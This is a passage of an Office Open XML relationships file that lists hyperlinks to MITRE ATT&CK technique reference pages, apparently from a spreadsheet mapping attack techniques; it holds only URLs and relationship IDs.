Target="https://attack.mitre.org/techniques/T1557/001" TargetMode="External"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1530" TargetMode="External"/><Relationship Id="rId335" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1104" TargetMode="External"/><Relationship Id="rId542" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1550/004" TargetMode="External"/><Relationship Id="rId181" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1499" TargetMode="External"/><Relationship Id="rId402" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1055/004" TargetMode="External"/><Relationship Id="rId279" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1574/01" TargetMode="External"/><Relationship Id="rId486" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1608/003" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1560/003" TargetMode="External"/><Relationship Id="rId139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1565" TargetMode="External"/><Relationship Id="rId346" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1571" TargetMode="External"/><Relationship Id="rId553" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1497" TargetMode="External"/><Relationship Id="rId192" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1546/002" TargetMode="External"/><Relationship Id="rId206" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1480" TargetMode="External"/><Relationship Id="rId413" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1090/002" TargetMode="External"/><Relationship Id="rId497" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1553/001" TargetMode="External"/><Relationship Id="rId620" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1430" TargetMode="External"/><Relationship Id="rId357" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1588/003" TargetMode="External"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1547/005" TargetMode="External"/><Relationship Id="rId217" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1567" TargetMode="External"/><Relationship Id="rId564" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1047" TargetMode="External"/><Relationship Id="rId424" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1021/002" TargetMode="External"/><Relationship Id="rId631" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1423" TargetMode="External"/><Relationship Id="rId270" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1574" TargetMode="External"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1037" TargetMode="External"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1602/001" TargetMode="External"/><Relationship Id="rId368" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1003" TargetMode="External"/><Relationship Id="rId575" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1402" TargetMode="External"/><Relationship Id="rId228" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1083" TargetMode="External"/><Relationship Id="rId435" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1053/001" TargetMode="External"/><Relationship Id="rId642" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1603" TargetMode="External"/><Relationship Id="rId281" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1574/012" TargetMode="External"/><Relationship Id="rId502" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1553/006" TargetMode="External"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1110/002" TargetMode="External"/><Relationship Id="rId141" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1565/002" TargetMode="External"/><Relationship Id="rId379" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1069" TargetMode="External"/><Relationship Id="rId586" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1577" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1134/003" TargetMode="External"/><Relationship Id="rId239" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1592/002" TargetMode="External"/><Relationship Id="rId446" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1597/002" TargetMode="External"/><Relationship Id="rId653" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1509" TargetMode="External"/><Relationship Id="rId292" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1525" TargetMode="External"/><Relationship Id="rId306" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1056/003" TargetMode="External"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1059/002" TargetMode="External"/><Relationship Id="rId513" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1033" TargetMode="External"/><Relationship Id="rId597" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1466" TargetMode="External"/><Relationship Id="rId152" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1491/001" TargetMode="External"/><Relationship Id="rId457" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1505" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1087/003" TargetMode="External"/><Relationship Id="rId317" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1036/004" TargetMode="External"/><Relationship Id="rId524" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1537" TargetMode="External"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1554" TargetMode="External"/><Relationship Id="rId163" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1561/001" TargetMode="External"/><Relationship Id="rId370" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1003/002" TargetMode="External"/><Relationship Id="rId230" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1222/001" TargetMode="External"/><Relationship Id="rId468" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1218/004" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1583/004" TargetMode="External"/><Relationship Id="rId328" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1578/002" TargetMode="External"/><Relationship Id="rId535" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1552/006" TargetMode="External"/><Relationship Id="rId174" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1114" TargetMode="External"/><Relationship Id="rId381" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1069/002" TargetMode="External"/><Relationship Id="rId602" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1428" TargetMode="External"/><Relationship Id="rId241" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1592/004" TargetMode="External"/><Relationship Id="rId479" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1216/001" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1071/002" TargetMode="External"/><Relationship Id="rId339" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1498" TargetMode="External"/><Relationship Id="rId546" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1204/003" TargetMode="External"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1584/002" TargetMode="External"/><Relationship Id="rId185" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1499/004" TargetMode="External"/><Relationship Id="rId406" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1055/011" TargetMode="External"/><Relationship Id="rId392" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1542/001" TargetMode="External"/><Relationship Id="rId613" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1617" TargetMode="External"/><Relationship Id="rId252" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1590/006" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1020/001" TargetMode="External"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1543" TargetMode="External"/><Relationship Id="rId557" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1600" TargetMode="External"/><Relationship Id="rId196" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1546/006" TargetMode="External"/><Relationship Id="rId417" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1620" TargetMode="External"/><Relationship Id="rId624" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1444" TargetMode="External"/><Relationship Id="rId263" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1564/003" TargetMode="External"/><Relationship Id="rId470" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1218/007" TargetMode="External"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1547/009" TargetMode="External"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1485" TargetMode="External"/><Relationship Id="rId330" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1578/004" TargetMode="External"/><Relationship Id="rId568" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1432" TargetMode="External"/><Relationship Id="rId165" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1484" TargetMode="External"/><Relationship Id="rId372" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1003/004" TargetMode="External"/><Relationship Id="rId428" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1021/006" TargetMode="External"/><Relationship Id="rId635" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1424" TargetMode="External"/><Relationship Id="rId232" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1495" TargetMode="External"/><Relationship Id="rId274" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1574/005" TargetMode="External"/><Relationship Id="rId481" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1518" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1583/006" TargetMode="External"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1037/005" TargetMode="External"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1213/002" TargetMode="External"/><Relationship Id="rId537" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1535" TargetMode="External"/><Relationship Id="rId579" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1414" TargetMode="External"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1115" TargetMode="External"/><Relationship Id="rId176" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1114/002" TargetMode="External"/><Relationship Id="rId341" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1498/002" TargetMode="External"/><Relationship Id="rId383" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1566" TargetMode="External"/><Relationship Id="rId439" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1053/005" TargetMode="External"/><Relationship Id="rId590" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1447" TargetMode="External"/><Relationship Id="rId604" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1449" TargetMode="External"/><Relationship Id="rId646" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1437" TargetMode="External"/><Relationship Id="rId201" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1546/011" TargetMode="External"/><Relationship Id="rId243" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1589/001" TargetMode="External"/><Relationship Id="rId285" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1562/003" TargetMode="External"/><Relationship Id="rId450" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1596/003" TargetMode="External"/><Relationship Id="rId506" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1195/003" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1071/004" TargetMode="External"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1584/004" TargetMode="External"/><Relationship Id="rId310" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1559/002" TargetMode="External"/><Relationship Id="rId492" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1558/002" TargetMode="External"/><Relationship Id="rId548" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1078/001" TargetMode="External"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1059/006" TargetMode="External"/><Relationship Id="rId145" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1001/002" TargetMode="External"/><Relationship Id="rId187" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1585" TargetMode="External"/><Relationship Id="rId352" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1027/005" TargetMode="External"/><Relationship Id="rId394" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1542/003" TargetMode="External"/><Relationship Id="rId408" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1055/013" TargetMode="External"/><Relationship Id="rId615" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1516" TargetMode="External"/><Relationship Id="rId212" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1041" TargetMode="External"/><Relationship Id="rId254" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1591/001" TargetMode="External"/><Relationship Id="rId657" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1481" TargetMode="External"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1547" TargetMode="External"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1543/002" TargetMode="External"/><Relationship Id="rId296" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1070/003" TargetMode="External"/><Relationship Id="rId461" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1505/004" TargetMode="External"/><Relationship Id="rId517" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1569/002" TargetMode="External"/><Relationship Id="rId559" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1600/002" TargetMode="External"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1547/011" TargetMode="External"/><Relationship Id="rId156" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1587" TargetMode="External"/><Relationship Id="rId198" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1546/008" TargetMode="External"/><Relationship Id="rId321" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1556" TargetMode="External"/><Relationship Id="rId363" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1137/002" TargetMode="External"/><Relationship Id="rId419" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1563" TargetMode="External"/><Relationship Id="rId570" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1413" TargetMode="External"/><Relationship Id="rId626" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1398" TargetMode="External"/><Relationship Id="rId223" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1211" TargetMode="External"/><Relationship Id="rId430" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1091" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1098/002" TargetMode="External"/><Relationship Id="rId265" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1564/005" TargetMode="External"/><Relationship Id="rId472" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1218/009" TargetMode="External"/><Relationship Id="rId528" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1111" TargetMode="External"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1132/001" TargetMode="External"/><Relationship Id="rId167" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1484/002" TargetMode="External"/><Relationship Id="rId332" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1601" TargetMode="External"/><Relationship Id="rId374" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1003/006" TargetMode="External"/><Relationship Id="rId581" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1448" TargetMode="External"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1217" TargetMode="External"/><Relationship Id="rId234" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1606" TargetMode="External"/><Relationship Id="rId637" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1544" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1548/003" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1595/001" TargetMode="External"/><Relationship Id="rId276" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1574/007" TargetMode="External"/><Relationship Id="rId441" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1053/007" TargetMode="External"/><Relationship Id="rId483" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1608" TargetMode="External"/><Relationship Id="rId539" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1550/001" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1560" TargetMode="External"/><Relationship Id="rId136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1005" TargetMode="External"/><Relationship Id="rId178" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1573" TargetMode="External"/><Relationship Id="rId301" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1105" TargetMode="External"/><Relationship Id="rId343" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1135" TargetMode="External"/><Relationship Id="rId550" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1078/003" TargetMode="External"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1538" TargetMode="External"/><Relationship Id="rId203" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1546/013" TargetMode="External"/><Relationship Id="rId385" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1566/002" TargetMode="External"/><Relationship Id="rId592" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1476" TargetMode="External"/><Relationship Id="rId606" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1405" TargetMode="External"/><Relationship Id="rId648" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1474" TargetMode="External"/><Relationship Id="rId245" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1589/003" TargetMode="External"/><Relationship Id="rId287" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1562/006" TargetMode="External"/><Relationship Id="rId410" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1572" TargetMode="External"/><Relationship Id="rId452" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1596/005" TargetMode="External"/><Relationship Id="rId494" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1558/004" TargetMode="External"/><Relationship Id="rId508" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1614" TargetMode="External"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1584/006" TargetMode="External"/><Relationship Id="rId147" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1074" TargetMode="External"/><Relationship Id="rId312" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1570" TargetMode="External"/><Relationship Id="rId354" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1588" TargetMode="External"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1547/002" TargetMode="External"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1059/008" TargetMode="External"/><Relationship Id="rId189" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1585/002" TargetMode="External"/><Relationship Id="rId396" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1542/005" TargetMode="External"/><Relationship Id="rId561" 